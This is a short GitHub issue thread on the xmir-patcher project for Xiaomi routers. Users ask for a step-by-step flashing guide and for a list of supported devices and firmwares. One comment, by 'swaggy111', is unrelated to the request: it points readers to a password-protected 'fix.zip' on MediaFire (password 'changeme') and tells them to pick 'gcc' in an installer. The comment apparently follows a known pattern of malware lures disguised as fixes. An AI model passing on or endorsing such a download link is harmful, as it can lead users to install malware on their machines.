openwrt-xiaomi/xmir-patcher #34: Call for Documentation

maxpill, 2024-08-26:
****Issue Description****

The XMiR-Patcher repository provides a valuable tool for patching Xiaomi router firmware, but it lacks comprehensive documentation on how to utilize the tool after running it to flash the firmware. This issue aims to request the creation of a detailed guide to help users successfully flash their firmware after executing the patcher.

****Current State****

The repository's README file provides very limited, but enough instructions for running the patcher on Windows, Linux, and Mac OS. However, it does not offer any kind of guidance on the subsequent steps required to flash the firmware nor on how to use the patcher functionalities.

****Request****

We kindly request that the repository maintainers or contributors create a step-by-step guide on how to flash the firmware after running the XMiR-Patcher. This guide should include:

* Detailed instructions for each supported operating system (Windows, Linux, and Mac OS)
* Screenshots or diagrams to illustrate the process, if possible
* Troubleshooting tips for common issues that may arise during the flashing process

[image]

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

AT-StephenDetomasi, 2025-01-16:
Agreed. I would also like to know which devices are supported, and on which firmwares - this doesn't seem to be documented anywhere.